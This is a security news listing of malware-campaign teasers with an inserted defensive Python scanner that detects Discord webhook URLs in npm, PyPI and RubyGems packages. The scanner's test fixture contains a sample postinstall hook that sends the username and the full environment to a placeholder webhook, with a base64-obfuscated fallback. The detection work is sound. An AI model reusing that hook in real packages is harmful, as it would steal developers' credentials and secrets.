Malware

North Korean Hackers Merge BeaverTail and OtterCookie into Sophisticated JavaScript Malware

North Korean hackers linked to the Contagious Interview campaign are enhancing their malicious tooling by merging two major malware families, BeaverTail and OtterCookie. This evolution, observed by Cisco Talos, shows that the group is actively upgrading its capabilities and refining its JavaScript-based attack methods.

Ongoing Campaign and New Findings

According to Cisco Talos, the recent […]


LinkPro Linux Rootkit Uses eBPF to Hide, Activates via Magic TCP Packets

An investigation into a compromise of Amazon Web Services (AWS)-hosted infrastructure uncovered a new GNU/Linux rootkit named LinkPro, according to Synacktiv. The backdoor relies on two eBPF (extended Berkeley Packet Filter) modules: one for stealth and one for remote activation. The initial access vector was an exposed Jenkins server exploited via CVE-2024-23897, after which a malicious Docker


Attackers Use Blockchain Smart Contracts to Distribute Malware Through Compromised WordPress Sites

Cybersecurity researchers have observed a financially motivated threat actor, tracked as UNC5142, leveraging blockchain smart contracts to distribute information-stealing malware targeting both Windows and macOS systems. This operation demonstrates how attackers combine traditional web compromises with Web3 technology to evade detection and increase operational resilience.

Malware Distribution via WordPress and Blockchain

According to the


Banking Malware Exploits WhatsApp to Take Remote Control of Computers

A newly discovered malware campaign is spreading rapidly across Brazil, using WhatsApp as its main delivery channel. Cybersecurity experts have identified this advanced banking Trojan as “Maverick”, a threat capable of taking remote control of infected computers and stealing sensitive financial data.

Massive Scale of Infection

Researchers report that over 62,000 infection attempts were blocked


GhostBat RAT Masquerades as Fake RTO Android Apps to Steal Banking Data from Indian Users

A new, persistent Android campaign, attributed to GhostBat RAT, impersonates Regional Transport Office (RTO) applications to steal banking data from Indian users. Attackers distribute malicious droppers through WhatsApp, SMS with shortened URLs, GitHub-hosted APKs, and compromised websites, then use multi-stage loading, ZIP header manipulation, native libraries, and extensive string obfuscation to avoid detection


npm, PyPI, and RubyGems Packages Caught Exfiltrating Developer Data to Discord Channels

Cybersecurity researchers have uncovered several malicious packages in the npm, Python (PyPI), and RubyGems ecosystems that exfiltrate sensitive developer data using Discord webhooks as their command-and-control (C2) channel. The malicious packages post the stolen information directly to Discord channels the attackers control.

Discord Webhooks Used as a Stealthy Data Channel

Discord webhooks provide

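For the Discord-webhook item above, an added example rather than code from the article or from any of the reported packages: a small Python scanner that walks an unpacked npm, PyPI or RubyGems artifact and flags Discord webhook URLs, both in the clear and wrapped in base64 for run-time decoding (the `atob()` / `Buffer.from(..., "base64")` pattern). It relies only on the public shape of a Discord webhook endpoint, `https://discord.com/api/webhooks/<snowflake id>/<token>`, with `discordapp.com`, `ptb.` and `canary.` as alternate hosts; the sample postinstall script, the file names and the token in it are constructed placeholders, not real artifacts.

```python
"""Flag Discord webhook URLs embedded in package files (added example).

Assumes only the public webhook URL shape
https://discord.com/api/webhooks/<17-20 digit id>/<URL-safe token>;
the discordapp.com, ptb. and canary. hosts serve the same API.
The sample package below is constructed for the demo; the token is a placeholder.
"""
from __future__ import annotations

import base64
import binascii
import os
import re
import tempfile
from pathlib import Path

# Webhook URL: optional ptb./canary. host prefix, discord or discordapp domain,
# numeric snowflake id, then a long URL-safe token.
WEBHOOK_RE = re.compile(
    rb"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/"
    rb"\d{17,20}/[A-Za-z0-9_\-]{30,}"
)
# Runs of base64 alphabet long enough to hold an encoded webhook URL.
B64_RE = re.compile(rb"[A-Za-z0-9+/=]{60,}")
# File types worth scanning in an npm / PyPI / RubyGems artifact (assumption).
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".json", ".py", ".rb", ".gemspec", ".sh"}


def find_webhooks(data: bytes) -> list[str]:
    """Return the distinct webhook URLs in data, cleartext or base64-wrapped."""
    hits = {m.group(0).decode() for m in WEBHOOK_RE.finditer(data)}
    for blob in B64_RE.finditer(data):
        try:
            decoded = base64.b64decode(blob.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64, e.g. a long identifier in minified JS
        hits.update(m.group(0).decode() for m in WEBHOOK_RE.finditer(decoded))
    return sorted(hits)


def scan_tree(root: str | os.PathLike) -> dict[str, list[str]]:
    """Map relative file path -> webhook URLs for every scannable file under root."""
    root = Path(root)
    findings: dict[str, list[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix in SCAN_SUFFIXES:
            hits = find_webhooks(path.read_bytes())
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


# --- constructed sample input (not taken from any real package) -------------
FAKE_TOKEN = "A" * 68  # placeholder; real tokens are about 68 URL-safe characters
RAW_URL = f"https://discord.com/api/webhooks/123456789012345678/{FAKE_TOKEN}"
OBF_URL = f"https://discordapp.com/api/webhooks/987654321098765432/{FAKE_TOKEN}"

# A postinstall hook that posts the environment to one webhook in the clear and
# keeps a second, base64-encoded one as a fallback decoded at run time.
SAMPLE_POSTINSTALL_JS = (
    b'const os = require("os");\n'
    b'const hook = "' + RAW_URL.encode() + b'";\n'
    b'const alt = atob("' + base64.b64encode(OBF_URL.encode()) + b'");\n'
    b'const body = JSON.stringify({ u: os.userInfo().username, env: process.env });\n'
    b'fetch(hook, { method: "POST", body }).catch(() => fetch(alt, { method: "POST", body }));\n'
)
# A benign module that merely links to a Discord invite: must not be flagged.
SAMPLE_INDEX_JS = b"// Support: https://discord.com/invite/example\nmodule.exports = {};\n"


def demo() -> dict[str, list[str]]:
    """Write the constructed package to a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp) / "package"
        (pkg / "scripts").mkdir(parents=True)
        (pkg / "scripts" / "postinstall.js").write_bytes(SAMPLE_POSTINSTALL_JS)
        (pkg / "index.js").write_bytes(SAMPLE_INDEX_JS)
        return scan_tree(pkg)


if __name__ == "__main__":
    for rel_path, urls in demo().items():
        print(f"{rel_path}:")
        for url in urls:
            print(f"  {url}")
```

Run it against the extracted output of `npm pack`, `pip download` or `gem fetch` before the dependency is allowed in. A hit inside an install hook (`preinstall`/`postinstall`, `setup.py`, a gemspec extension) is high signal; a hit in documentation may be legitimate. The check is a first pass only: it will miss URLs assembled from concatenated fragments, hex or unicode escapes, or fetched from a second stage, so treat a clean result as "nothing obvious", not as "safe".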

Researchers Reveal TA585’s MonsterV2 Malware Capabilities, Full Attack Chain

Cybersecurity researchers have exposed a previously undocumented threat actor, TA585, which delivers an off-the-shelf malware called MonsterV2 through targeted phishing campaigns. Proofpoint researchers describe TA585 as operating a self-owned, end-to-end attack chain, managing infrastructure, delivery, and payload installation without relying on third-party distribution services.

Background and delivery methods

TA585 has used multiple delivery techniques in


RondoDox Botnet Exploits 50+ Vulnerabilities from 30 Vendors in Ongoing Attacks

Cybersecurity researchers have uncovered an ongoing wave of RondoDox botnet campaigns that now exploit more than 50 security vulnerabilities affecting over 30 technology vendors. Trend Micro described this campaign as an “exploit shotgun” strategy, where attackers target a broad spectrum of internet-exposed infrastructure including routers, DVRs, NVRs, CCTV systems, web servers, and other network-connected devices.


Astaroth Banking Trojan Uses GitHub to Stay Active After Multiple Takedowns

Security researchers have uncovered a new Astaroth banking trojan campaign that uses GitHub as fallback infrastructure, allowing the malware to remain operational even after its traditional command-and-control servers are taken down. By hosting encrypted configuration data on GitHub, the attackers make the campaign more resilient, and victims continue to be compromised across multiple


175 Malicious npm Packages Used in Credential Phishing Campaign with Over 26,000 Downloads

Security researchers have discovered 175 malicious packages on the npm registry, collectively downloaded about 26,000 times, that were used as part of a credential phishing campaign named Beamglea. The campaign used npm and unpkg.com as free hosting to serve redirect scripts, which in turn sent victims to Microsoft credential harvesting pages, increasing the realism and
